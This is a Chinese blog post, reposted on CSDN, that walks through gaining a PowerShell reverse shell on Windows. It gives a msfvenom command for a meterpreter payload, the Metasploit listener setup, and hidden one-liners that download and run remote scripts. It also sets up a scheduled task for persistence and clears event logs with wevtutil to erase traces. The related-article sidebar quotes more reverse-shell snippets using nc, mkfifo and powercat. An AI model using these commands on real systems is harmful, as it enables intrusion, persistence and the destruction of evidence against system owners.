PowerShell 反弹渗透技巧

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量257 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/LyShark/p/11360170.html
版权

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术,同时也包含了数种系统管理工具、简易且一致的语法,提升管理者的管理能力,自Windows 7 开始一直到Windows 10 包括服务器Windows Server 系统中,都将内置 PowerShell,其可作为白名单的一种绕过方式,也让渗透变得更加有趣。

PowerShell 基本反弹

  1. 生成PowerShell 脚本文件 shell.ps1 并将其放入到Web服务器目录下。
[root@localhost ~]# msfvenom -a x86 --platform Windows \
>                              -p windows/meterpreter/reverse_tcp \
>                              -b '\x00\x0b' LHOST=192.168.1.30 LPORT=9999 -f psh-cmd > shell.ps1

[root@localhost ~]# cp -a shell.ps1 /var/www/html/
[root@localhost ~]# systemctl restart httpd

2.MSF运行侦听事件,执行如下命令。

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit -j -z

3.在靶机执行以下命令,即可完成上线。

C://> powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://lyshark.com/shell.ps1');shell.ps1"
C://> powershell.exe wget "http://lyshark.com/shell.exe" -outfile "C:\shell.exe"

C://> schtasks /create /tn "PowerShell" /tr "这里存放待执行任务" /sc ONLOGON       创建计划任务

4.为防止暴露痕迹,在执行完命令后,需要在靶机执行以下命令,清理痕迹.

Microsoft Windows [版本 10.0.17763.316]
(c) 2018 Microsoft Corporation。保留所有权利。

C:\Users\lyshark>wevtutil cl "windows powershell"
C:\Users\lyshark>wevtutil cl "security"
C:\Users\lyshark>wevtutil cl "system"

转载于:https://www.cnblogs.com/LyShark/p/11360170.html

weixin_30790841
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf反弹shell
weixin_34179762的博客
05-15 971
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
powershell反弹shell
x10n9的博客
03-09 387
powershell反弹shell
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 3232
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
[Shell]Powershell反弹shell
baguangman5501的博客
09-08 1099
原作者:Cream 文章出处: 贝塔安全实验室 0x01 Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。...
powershell反弹shell常见方式
UKK
03-05 1925
powershell反弹shell常见方式 http://www.ifind.cc/view/154
PowerShell使用小技巧分享
01-20
如何使用PowerShell修改Host文件 下面的命令, 为Host文件添加了一条记录, 让/sps2010/hostheader1/这个url指向server自己. 代码如下: $url=”http://sps2010/hostheader1/” if( (Get-Content $env:windir\System32...
Powershell技巧之复合筛选
01-20
当你分析文本日志或筛选不通类型的信息时,你通常要使用 Where-Object。这里有一个通用脚本来说明复合筛选: # logical AND filter for ALL keywords Get-Content -Path C:\windows\WindowsUpdate.log | ...
PowerShell技巧之发送TCP请求
01-20
很多语言都有相应的方法实现上述需求,当然,PowerShell也不例外,比如我们要发送一个简单的http请求到指定的web服务器: GET / HTTP/1.1 Host:cn.bing.com 这里我们想请求微软必应的中文首页,如果需要通过...
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
powershell反弹cmd
qq_42307546的博客
03-30 2687
下载地址 https://github.com/besimorhino/powercat 这个powercat可以放在服务器上供目标机器远程下载执行 首先在当前目录用python开启一个http服务 python3 -m http.server 8080 在kali上开启监听666端口 nc -lvvp 666 在webshell上执行命令 powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.1
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
渗透测试/反弹shell
dkpower111的博客
02-02 273
Linux下的反弹shell 1、什么是反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2、反弹shell的原因 通常用于被控端因防火墙受限、权限不足、端口被占用等情形 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web
[ 隧道技术 ] 反弹shell的集中常见方式(三)powercat反弹shell
qq_51577576的博客
09-04 720
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1938
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
各种powershell反弹脚本
weixin_30235225的博客
05-25 139
含(tcp/udp/icmp/dns/http/wmi/http/https) https://github.com/samratashok/nishang/tree/master/Shells 还想再提一下这个项目(powershell版的nc) https://github.com/besimorhino/powercat ## 来源 http://www.labofa...
【信息安全】反弹shell
Nicky_Zheng的博客
12-02 211
1、windows-powershell反弹shell kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali windows端 $client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte
反弹shell总结
桀骜不逊
02-09 1082
nc反弹shell 正向shell nc -lvp 1234 -e /bin/bash # linux 服务端(被攻击的主机) nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机) nc host.example.com 1234 # linux 客户端 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.
反弹Shell总结
code_lab
09-05 768
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
"Powershell内网渗透实例详解与应用技巧
在内网渗透测试中,Powershell被广泛应用,成为渗透测试人员的得力助手。 总的来说,Powershell是一种功能强大、灵活易用的命令行脚本环境,适用于各种系统和应用程序的管理和自动化任务。通过Powershell,用户可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值